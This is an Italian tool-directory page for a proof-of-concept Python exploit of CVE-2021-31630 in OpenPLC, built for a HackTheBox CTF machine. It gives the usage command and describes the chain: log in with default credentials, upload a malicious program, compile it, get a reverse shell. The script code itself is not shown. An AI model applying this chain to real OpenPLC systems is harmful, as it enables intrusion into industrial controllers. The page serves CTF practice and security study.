Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
htb-wifinetictwo-exploit — Un semplice script Python per sfruttare CVE-2021-31630 su HTB WifineticTwo CTF | Kitploit
Strumenti/GitHubGitHub/behindsecurity/htb-wifinetictwo-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFApprendimento e FormazioneStrumento di Accesso RemotoBinary Exploitation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
behindsecurity/htb-wifinetictwo-exploit

htb-wifinetictwo-exploit

Un semplice script Python per sfruttare CVE-2021-31630 su HTB WifineticTwo CTF

Vedi Repository
2 anni faNon ancora revisionato

Exploit PoC CVE-2021-31630

Questo script Python è un exploit Proof of Concept (PoC) per la CVE-2021-31630, che mira a una vulnerabilità in OpenPLC in esecuzione sulla macchina WifineticTwo di HackTheBox. È progettato esclusivamente per scopi educativi e mira a dimostrare il processo di sfruttamento in un ambiente controllato.

Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e a scopi educativi. L'utilizzo di questo strumento per attaccare obiettivi senza il preventivo consenso reciproco è illegale. Lo sviluppatore non sarà ritenuto responsabile per eventuali danni o accuse penali a carico degli utenti che fanno un uso improprio di questo exploit.

Prerequisiti

Prima di eseguire questo exploit, assicurati di avere:

  • Python 3 installato sul tuo sistema.
  • La libreria requests installata. Puoi installarla usando pip install requests.

Utilizzo

Per utilizzare questo exploit, devi specificare l'URL del target, l'IP dell'host locale (LHOST) e la porta locale (LPORT) a cui la reverse shell deve connettersi. Facoltativamente, puoi specificare nome utente e password per OpenPLC se differiscono da quelli predefiniti.

root@kitploit:~
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]

Argomenti

  • --target - Indirizzo di base del target. Esempio: http://wifinetictwo.htb:8080
  • --lhost - Indirizzo IP dell'host locale a cui la reverse shell deve connettersi.
  • --lport - Porta locale a cui la reverse shell deve connettersi.
  • --usr - (Opzionale) Nome utente per OpenPLC. Il valore predefinito è openplc.
  • --pwd - (Opzionale) Password per OpenPLC. Il valore predefinito è openplc.

Funzionalità

  • Gestisce automaticamente il processo di login utilizzando le credenziali fornite.
  • Costruisce e carica un payload dannoso per ottenere l'esecuzione remota di codice.
  • Avvia una reverse shell verso l'IP e la porta specificati dall'attaccante.

Processo di Exploit

  1. Login: Lo script accede all'applicazione OpenPLC utilizzando le credenziali fornite.
  2. Creazione del Payload: Costruisce dinamicamente un payload dannoso progettato per avviare una reverse shell.
  3. Caricamento del Payload: Carica il payload creato sul server.
  4. Attivazione dell'Exploit: Attiva l'exploit tentando di compilare il codice dannoso caricato, ottenendo una reverse shell.

Ringraziamenti

  • Un ringraziamento speciale a Fellipe Oliveira che ha scoperto e segnalato la CVE-2021-31630.
  • HackTheBox per aver fornito un ambiente realistico in cui esercitarsi e imparare la cybersecurity.
Scarica lo strumento